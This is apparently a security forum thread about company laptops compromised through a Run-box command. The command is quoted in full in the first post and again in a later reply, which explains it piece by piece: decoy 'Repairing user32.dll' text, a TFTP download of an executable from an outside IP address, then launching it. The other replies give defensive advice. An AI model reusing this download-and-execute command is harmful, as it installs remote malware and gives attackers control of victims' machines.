Compromised Windows XP machine
Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: Compromised Windows XP machine

  1. #1
    Senior Member
    Join Date
    Sep 2005
    Posts
    221

    Compromised Windows XP machine

    In my company, some people take laptops out in the field, aka the real world..

    Many have reported, and I have seen myself, lots of emails being sent after something like this shows up in the start>run window ..

    %comspec% /c echo Repairing user32.dll & echo Please Wait... tftp -i 75.132.3.206 GET xpjush.exe & start xpjush&
    I've turned the windows firewall back on and I think that'll do it, but I was wondering if the machine was definitely compromised or if it was something that could be stopped.. ?
    Definitions: Hacker vs. Cracker
    Gentoo Linux user, which probably says a lot about me..
    AGA member 14460 || KGS : Trevoke and games archived

  2. #2
    I'd rather be fishing DjM's Avatar
    Join Date
    Aug 2001
    Location
    The Great White North
    Posts
    1,867
    Short answer is, yes you are compromised. It's seems to have something to do with VNC.
    More Info is here:

    http://forums.speedguide.net/showthread.php?t=219431

    Cheers:
    DjM

  3. #3
    Senior Member
    Join Date
    Sep 2005
    Posts
    221
    Thanks for the link!
    Definitions: Hacker vs. Cracker
    Gentoo Linux user, which probably says a lot about me..
    AGA member 14460 || KGS : Trevoke and games archived

  4. #4
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,403
    Quote Originally Posted by Trevoke
    I've turned the windows firewall back on and I think that'll do it, but I was wondering if the machine was definitely compromised or if it was something that could be stopped.. ?
    Turning on the XP firewall won't do it. It doesn't block outgoing traffic. Those machines are compromised alright. Better be safe then sorry and reinstall. Don't forget all the service packs and patches too.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  5. #5
    Regal Making Handler
    Join Date
    Jun 2002
    Posts
    1,668
    The first download called, will open windows firewall to download the second exe, which if your AV defs are upto date, should catch the payload.
    What happens if a big asteroid hits the Earth? Judging from realistic simulations involving a sledge hammer and a common laboratory frog, we can assume it will be pretty bad. - Dave Barry

  6. #6
    Dissident 4dm1n brokencrow's Avatar
    Join Date
    Feb 2004
    Location
    Shawnee country
    Posts
    1,242
    Try an online scan via www.pandasoftware.com or housecall.trendmicro.com

    Never hurts to get a second opinion.
    “Everybody is ignorant, only on different subjects.” — Will Rogers

  7. #7
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Trevoke, I won't waist your time with what I think as I agree with the answers here, however, knowing what OS you like to use, I think it could be a neat idea if you set up a machine to sniff traffic and see where this stuff comes in from.

    Could be a fun little project for you. I used to do something similar at my college: I would set up my laptop on the network, open up iptraf, watch, then open up wireshark if I wanted a GUI, and kind of watch what was going on.

    It's amazing what an expensive firewall used by a college will let in heh.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  8. #8
    Senior Member
    Join Date
    Sep 2005
    Posts
    221
    A fair idea, gore. I like it. Thanks.
    Definitions: Hacker vs. Cracker
    Gentoo Linux user, which probably says a lot about me..
    AGA member 14460 || KGS : Trevoke and games archived

  9. #9
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    No problem. And hey if you track them down you might be able to prevent more
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  10. #10
    Right turn Clyde Nokia's Avatar
    Join Date
    Aug 2003
    Location
    Button Moon
    Posts
    1,696
    %comspec% /c echo Repairing user32.dll & echo Please Wait... tftp -i 75.132.3.206 GET xpjush.exe & start xpjush&
    I think it could be a neat idea if you set up a machine to sniff traffic and see where this stuff comes in from.
    Good job they didn't include their IP address in the exploit command as it would be too easy to track them down then....you would have to sniff the network traffic to work it out......

    Check your eventvwr and you will see the IP address that they connected from, which will more than likely be the same one that you see in the command they issued.

    A break down of the command is:

    %comspec% is a variable which points to
    the command prompt exe.

    The /c switch tells the command shell to carry out the command passed to it and then terminate.

    echo, will obviously display what ever follows the command onto the screen - this is just to make the user think something is happening to Windows and can be anything that you want it to be.

    Now the host will connect via TFTP to 75.132.3.206, the -i switch tells it to GET (download) the file in octet format, which is the method used to receive exe files

    Then the newly downloaded file is launched

    It is a very common exploit and is mistakenly believed to relate to VNC - whilst VNC is the easiest way to connect to a remote host to issue the command, it is not directly at fault and really does not have much to do with the way to command works and the end result of issuing it.

    Normally the first goal would be to see if the Windows firewall is on and if it is, to add a few exceptions to it to enable to attacker to connect to you on what ever port the newly downloaded application will listen on. If you are not logged in as a local admin then this is negated and the attack will fail. If you are logged in as a local admin then it's time to learn a lesson, as the attacker will probably have spawned a shell with local admin rights and you are pretty much guaranteed of not getting rid of him (if he is any good).

    Either way, if someone has ran that command then you will now have an application running on your machine that you don't really want.... I would personally go through all the necessary stuff to locate and remove it.
    Last edited by Nokia; June 28th, 2007 at 10:33 AM.
    Drugs have taught an entire generation of kids the metric system.

    http://tazforum.**********.com/

Similar Threads

  1. Slack BSD
    By gore in forum Operating Systems
    Replies: 2
    Last Post: February 25th, 2005, 08:12 AM
  2. October MS updates
    By mohaughn in forum Microsoft Security Discussions
    Replies: 2
    Last Post: October 13th, 2004, 05:31 AM
  3. suse is crap on finding cdrom
    By rajunpl in forum Operating Systems
    Replies: 43
    Last Post: July 1st, 2004, 08:30 AM
  4. Usefull Windows XP, 2k, NT, and 9x tips and tweaks
    By Cybr1d in forum Miscellaneous Security Discussions
    Replies: 11
    Last Post: June 10th, 2004, 01:09 AM
  5. Windows 2003 Server Vulnerability
    By warl0ck7 in forum Microsoft Security Discussions
    Replies: 7
    Last Post: August 14th, 2003, 01:23 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •